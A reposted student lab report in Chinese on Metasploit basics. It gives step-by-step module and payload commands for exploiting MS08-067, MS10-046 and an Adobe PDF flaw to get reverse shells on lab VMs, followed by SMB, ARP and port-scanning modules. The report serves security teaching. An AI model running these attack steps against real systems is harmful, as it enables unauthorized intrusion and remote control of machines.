2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

最新推荐文章于 2024-07-23 17:16:07 发布
最新推荐文章于 2024-07-23 17:16:07 发布
阅读量163 收藏
点赞数
文章标签: shell 操作系统 网络
原文链接:http://www.cnblogs.com/yyzzuishuai/p/10742539.html
版权

2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

1.基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具

payload:就是攻击的代码,是载荷。

encode:为了帮助攻击载荷避免被杀软发现,进行伪装。

2.实践总结与体会

在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,不能让别人有机可乘哈哈哈。。

3.离实战还缺些什么技术或步骤?

实战的时候要结合靶机的具体环境考虑,结合具体应用的漏洞去实践。

4.实践过程记录

主动攻击:ms08_067

windows ip :192.168.128.135
kali ip :192.168.128.133
实验前先查看kali与靶机是否可以ping通
1301336-20190420201712276-1048471647.png

输入msfconsole进入msf,首先使用search命令搜寻有关漏洞MS08_067的相关信息
1301336-20190420201721595-63686023.png
用use exploit/windows/smb/ms08_067_netapi使用该模块:
再使用show payloads查看可以供我们使用的payload:
1301336-20190420201734675-1002213008.png

用show targets查看可以被攻击的靶机的操作系统型号,这里我们默认选择0采用自动选取
1301336-20190420201803408-1715800376.png


接下来设置攻击有效载荷(set payload generic/shell_reverse_tcp)
我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置:
1301336-20190420201905679-2138364149.png

使用指令show options查看我们需要设置的参数,发现需要设置一个
RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):
1301336-20190420201936766-1783364513.png

设置完相应的参数后,再次使用show options对攻击的选项进行查看:
1301336-20190420201953527-1288691017.png
1301336-20190420201959835-1950589326.png


攻击成功后获取了靶机的shell,使用systeminfo指令查看靶机系统信息:
1301336-20190420202010759-1457579139.png
1301336-20190420202017221-353309194.png

在kali上执行ipconfig/all得到如下图所示:
1301336-20190420202030208-536417613.png

IE浏览器渗透攻击——ms10_046安全漏洞

基本步骤还是和上面一样,先利用search ms10_046指令查看可以运用的攻击模块:
1301336-20190420202105976-188710248.png

使用命令,选取模块use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用指令set payload generic/shell_reverse_tcp对payload进行设置:
再输入命令show options
然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:
1301336-20190420202118353-243717986.png

进行设置并且查看:
1301336-20190420202140851-1462666013.png

1301336-20190420202152164-1466572128.png

使用exploit指令执行漏洞,可以看到生成了一个url:
1301336-20190420202157865-212942663.png

在靶机的IE浏览器上使用该url进行访问,在MSF终端看见提示404错误
1301336-20190420202212716-1555196719.png
1301336-20190420202218769-1022561866.png

1301336-20190420202226226-1585298997.png

针对客户端的攻击

用search adobe查询一下针对该漏洞的攻击模块:
1301336-20190420202318337-207568871.png

选择了rank为good这款:
1301336-20190420202328283-1970217144.png

输入命令use exploit/windows/fileformat/adobe_utilprintf进入该漏洞模块的使用
1301336-20190420202334767-1446963890.png

使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
输入命令show options显示我们需要在攻击前需要设置的数据
输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
1301336-20190420202355781-503910542.png

粘贴到xp中:
1301336-20190420202401640-847095399.png

使用use exploit/multi/handler新建一个监听模块
使用set payloads windws/meterpreter/reverse_tcp建立一个反向连接,设置set LPORT 5332
1301336-20190420202409887-1238225162.png

使用命令exploit开始攻击,在xp中打开pdf。同时kali会显示连接成功的结果。
1301336-20190420202416432-937042886.png

输入shell获取靶机信息
1301336-20190420202423423-997278588.png

在靶机xp中使用命令netstat -an,看本地tcp连接。
1301336-20190420202432815-1682867297.png

辅助模块应用

开放端口扫描
使用show auxiliary查看可以运用的辅助模块:
1301336-20190420202512635-1807896013.png

使用此模块扫描端口use auxiliary/scanner/portscan/syn
使用命令show optionsset RHOSTS 192.168.128.136(目标)set THREADS 50(线程)exploit
1301336-20190420202520862-1749714008.png

1301336-20190420202528298-1318486064.png

监听结果显示:
1301336-20190420202533696-1549763690.png

枚举系统上的用户
模块:auxiliary/scanner/smb/smb_enumusers
功能:枚举系统上的用户
使用命令:use auxiliary/scanner/smb/smb_enumusers进行设置:
1301336-20190420202624228-993568159.png
1301336-20190420202641331-1557390364.png

然后就可以开始exploit了。
1301336-20190420202648506-1394896509.png

cert扫描
用途:可以查到一个子网段内的服务器的证书情况。
这是用于扫描ssl证书的,ssl安全连接需要身份认证——数字证书
使用命令use auxiliary/scanner/http/cert进行相关设置
1301336-20190420202656509-811773720.png

扫描结果:
1301336-20190420202706276-1721005499.png

MS02 _ 063 _ pptp_dos
1301336-20190420202712969-274891760.png

这是Windows 2000/XP中PPTP服务的拒绝服务攻击缺陷。
攻击者利用此缺陷仅仅能够进行拒绝服务攻击,并不能获得任何信息和任何权限。
使用use使用此模块:
1301336-20190420202721139-667969303.png

进行配置:
1301336-20190420202736832-1521911879.png

exploit看看效果:竟然被拒绝了。。。

arp_sweep
arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描。进入模块后查询一下参数,
msf > use auxiliary/scanner/discovery/arp_sweep ---进入arp_sweep 模块
msf auxiliary(arp_sweep) > show options ---查询模块参数
并且配置好后进行exploit:
1301336-20190420202814349-2020934573.png

1301336-20190420202823956-880084667.png

1301336-20190420202830324-1037810159.png

因为打开了win xp和虚拟机kali,扫描到了好几个活跃机,
发现xp的ip地址是:
192.168.128.138
主机的ip地址是
192.168.128.1

转载于:https://www.cnblogs.com/yyzzuishuai/p/10742539.html

weixin_30591551
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 五十九.Windows安全缺陷利用之MS08-067远程代码执行及深度防御解析
杨秀璋的专栏
03-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Windows远程桌面服务漏洞(CVE-2019-0708)复现,利用RDP和Metasploit工具反弹shell。本文将讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。本文是一篇CVE漏洞还原的基础性文章,希望对您有所
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 349
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
2018-2019-2 20165312《网络攻防技术Exp5 MSF基础应用
weixin_30859423的博客
04-13 219
2018-2019-2 20165312《网络攻防技术Exp5 MSF基础应用 目录 一、知识点总结 二、攻击实例 主动攻击的实践 ms08_067 payload/generic/shell_reverse_tcp(成功) payload/windows/meterpreter/reverse_tcp(失败) ms17_010_eternalblue payload/generic...
[漏洞复现]ms17-010(永恒之蓝)复现
一个安全研究员
02-04 2507
如题
Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)
weixin_34189116的博客
04-29 3214
第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型 4、攻击Windows服务器 5、利用公用服务 6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏 7、MS17-010 EternalRomance/EternalSynergy/EternalChampion 8、植入后门 9、拒绝服务攻击 简介 在第二...
2018-2019-2 20189212 《网络攻防技术》第七周作业
weixin_30567471的博客
04-14 900
网络攻防技术》第七章 7.1Windows操作系统基本框架概述 7.1.1Windows操作系统的发展与现状 7.1.2Windows操作系统的基本结构 Windows操作系统的基本机构如下图所示,分为运行于处理器特权模式(ring 0)的操作系统内核,以及运行在处理机非特权模式(ring 3)的用户空间代码。 Windows操作系统内核的基本模块包括如下: Windows执行体:即Wi...
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
5. 重启sshd服务以应用更改: - 对于Debian/Ubuntu系统: ``` sudo systemctl restart sshd ``` - 对于CentOS/RHEL系统: ``` sudo systemctl restart ssh ``` 6. 验证OpenSSH版本以确认升级成功: ``` ...
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
04-04
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
网络攻防技术与实践
ctylovelxy的博客
02-15 6391
网络攻防技术与实践–阅读笔记–(1)网络攻防实验环境搭建–INIT:Id”x” respawning too fast : disable for 5 minutes有志于从事网络安全工作的程序猿们一定不会错过诸葛建伟老师这本网络攻防技术与实践,在搭建网络攻防实验环境的时候我用的xin7,vmware workstation pro 12.0版本下面将我搭建环境中遇到的第一个小问题,以及解决办法分享
docker部署mysql8.x版本,编写shell脚本自动部署安装mysql
最新发布
qq_43700885的博客
07-23 395
*1.**先自行安装好docker环境,docker的镜像注册中心最好是国内的,例如执行一下命令直接修改docker配置,这里基本就按照成功了,直接输入docker查看日志命令查看容器启动情况。将下面的命令直接粘贴到文件install-mysql.sh。加载刚修改的配置文件并重新启动docker。**2.**创建mysql自动部署脚本文件。接下来直接执行脚本输入一下命令。出现下图红框标识就表示安装成功。
shell命令-2
m0_73664110的博客
07-21 998
s:套接字还被称为数据接口文件,这种类型的文件通常被用在网络上的数据连接。p:管道文件(FIFO)也是一种特殊的文件类型,他主要的目的解决多个程序同时访问一个文件所造成的错误问题,first-in-first-out。cat xxx.txt:显示文本的内容直接输出在屏幕上(不建议查看内容过多的文件,编辑器只能显示1000行)find . -maxdepth 3 -type f:当前目录开始深度为3层的所有普通文件。find . -name “*.txt”:在当前文件夹下查找以.txt结尾的文件。
MAC安装brew+python+pip
weixin_44435110的博客
07-21 293
要在 macOS 上安装 Homebrew,请按照以下步骤操作
内网隧道——隧道利用方法
qq_55202378的博客
07-23 759
(2)在靶机(192.168.52.138)3389端口和跳板机(192.168.52.143)的6666端口之间搭建一条隧道,就能通过跳板机的8888端口连接内网的3389端口。(2)在kali上连接跳板机8888端口,lcx会将跳板机8888端口的流量转发到靶机(192.168.52.138)3389端口上。工具进行端口转发,在靶机和跳板机中搭建一条隧道,用攻击者电脑连接跳板机隧道端口,通过跳板机的端口,获取到内网靶机的远程桌面权限。注:通过MSF获取到的shell,是经过加密了的。
虚拟环境变量和全局环境变量设置
Ppandaer的博客
07-23 281
/.bashrc和activate脚本各自扮演着不同的角色,它们都在 shell 环境配置中起关键作用,但是它们的职责范围和激活场景有所不同。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 915
Shell脚本的使用
shell编程——awk
nianwan2157的博客
07-19 843
root@server ~]# awk -v test="hello world" BEGIN'{ print test}'# 变量定义在-V参数后,print test}'#变量定义在BEGIN中。允许用户自定义自己的变量以便在程序代码中使用,变量名命名规则与大多数编程语言相同,只。变量名命名规则与大多数编程语言相同,只能使用字母、数字和下划线,且不能以数字开头。awk允许用户自定义自己的变量以便在程序代码中使用。能使用字母、数字和下划线,且不能以数字开头。因此,如果想输出空白行,则需要使。
内网MSF基础:PostgreSQL配置与权限管理教程
MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为MSF依赖于它来存储数据和配置。 1. **配置PostgreSQL**: - 安装PostgreSQL:通过apt-get...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值